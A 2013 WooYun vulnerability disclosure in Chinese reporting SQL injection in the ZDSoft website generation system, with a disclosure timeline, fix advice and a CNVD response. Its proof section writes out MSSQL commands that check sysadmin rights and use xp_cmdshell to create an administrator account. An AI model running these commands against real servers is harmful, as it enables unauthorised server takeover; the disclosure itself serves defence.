漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-037806
漏洞标题:ZDSoft网站生成系统严严重漏洞
相关厂商:ZDSoft网站生成系统
漏洞作者: 李旭敏
提交时间:2013-09-22 20:07
修复时间:2013-12-21 20:07
公开时间:2013-12-21 20:07
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-09-22: 细节已通知厂商并且等待厂商处理中
2013-09-26: 厂商已经确认,细节仅向厂商公开
2013-09-29: 细节向第三方安全合作伙伴开放
2013-11-20: 细节向核心白帽子及相关领域专家公开
2013-11-30: 细节向普通白帽子公开
2013-12-10: 细节向实习白帽子公开
2013-12-21: 细节向公众公开
简要描述:
感谢啊D和肉总的大力帮忙!利用该漏洞可以直接拿下ZDsoft网站生成系统的服务器···
详细说明:
如上,进入SQL语句执行的平台···前者说了可以爆出管理密码。而我说的,是直接拿下服务器。
可以看到是sa权限的···
判断xp_cmdshell扩展存储是否存在···
继续判断xp_regread扩展存储过程是否存在
执行cmd命令看看···
添加用户~~
加进管理组
就这样,根本无需啥后台拿shell,直接就搞定服务器了。
漏洞证明:
判断权限是不是sa
select is_srvrolemember('sysadmin')
返回是1说明是sa
判断xp_cmdshell扩展存储是否存在
select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell'
返回为l则证明存在
判断xp_regread扩展存储过程是否存在
select count(*) from master.dbo.sysobjects where name='xp_regread'
返回1证明存在
添加用户
exec master..xp_cmdshell 'net user test test /add'
exec master..xp_cmdshell 'net localgroup administrators test /add'
后来就是查看3389端口了,
exec master..xp_cmdshell 'XXXXX'里面输入cmd命令就是了
这些是肉肉和我搞了一个上午总结的。还有声明一下,她不是客服,她是技术人员!
修复方案:
可以禁止相关的扩展程序。把相关的DLL改名了就执行不了,之后再把相关的扩展名改一下名。或是直接把相关的文件权限禁了!加载过了再设置权限,不会有影响,然后重启一下服务器就行了。
以上是啊D的建议~~~~据说可以防范一般小黑黑。
我个人建议是:如果嫌麻烦的话可以装个D盾,里面有降权的功能。。
版权声明:转载请注明来源 李旭敏@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:18
确认时间:2013-09-26 22:46
厂商回复:
CNVD确认并复现所述情况,在多个互联网实例上可复现,暂未发现涉及重要和政府部门的案例.由CNVD直接协调软件生产厂商处置.
rank 18
最新状态:
暂无